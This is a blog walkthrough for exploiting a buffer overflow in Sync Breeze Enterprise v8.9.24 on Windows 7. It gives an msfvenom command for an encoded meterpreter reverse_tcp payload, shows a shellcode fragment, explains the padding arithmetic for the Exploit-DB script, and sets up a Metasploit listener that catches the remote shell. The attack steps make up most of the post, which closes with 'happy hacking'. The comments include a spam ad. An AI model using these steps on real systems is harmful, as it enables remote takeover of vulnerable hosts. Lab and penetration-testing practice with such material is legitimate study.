Hacking Wakthrough: Sync Breeze Enterprise v8.9.24

Software : Sync Breeze Enterprise v8.9.24

Exploit : https://www.exploit-db.com/exploits/40456

Operating system :  Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)


Follow these Steps:

  • Download 40456.py
  • Run the command : msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=your-ip LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
  • A payload will be generated (my payload size is  310)
  • Copy the payload and replace the payload that's in the python script.Payload starts at line 28 with : buf = ""
  • If your payload has  buf = b""
  • buf += b"\xd9\xed\xd9\x74\x24\xf4\xbb\x9c\x69\xcd\x48\x5d\x29" ! remove the letter "b" and make it look just like the exploit 
  • Go to this line: "\x41" * 12292 #subtract/add for payload
  • The script payload is 308 (#payload size 308) so mine is 2 bytes more. 
  • If your payload is 2 or more subtract 2  from 12292 ( 12292 - 2 = 12290). Use this number. If yours is less , then add .
  •  Edit connect=s.connect(('target-ip',81)). My port is 81 , so adjust.
  • Start msfconsole , use exploit/multi/handler 
  • set lhost your-ip , leave port like above 4444
  • generic/shell_reverse_tcp is the default shell , I assume your target is windows and it didn't work with me using the default shell , use this instead : set payload windows/meterpreter/reverse_tcp
  • Run the sell and listen to connection: run
  • Now  run the exploit : python 40456.py
  • You will have a meterpreter shell , type: shell 
  • Enjoy and happy hacking :)

Comments

  1. Thank you. I was adding the +2 bytes instead of subtracting them. I've literally been pounding my head on the wall for 4 hours trying to find out why this simple exploit wasn't working. You just saved me a lot of pain.

    ReplyDelete
  2. Seminole Hard Rock Hotel Casino - MapYRO
    Find 삼척 출장안마 your way around 군산 출장마사지 the casino, find where everything is located with these helpful 경상북도 출장안마 tips. We have over 김해 출장샵 2,500 slot machines, over 300 table 제천 출장마사지 games,

    ReplyDelete

Post a Comment

Popular posts from this blog

Hacking walkthrough: Cacti 1.2.8 exploit Ubuntu 18.04.3 LTS [RCE] [PE]

Hacking Wakthrough : Linux version 3.10.0-123.el7.x86_64 / Wordpress 4.7.2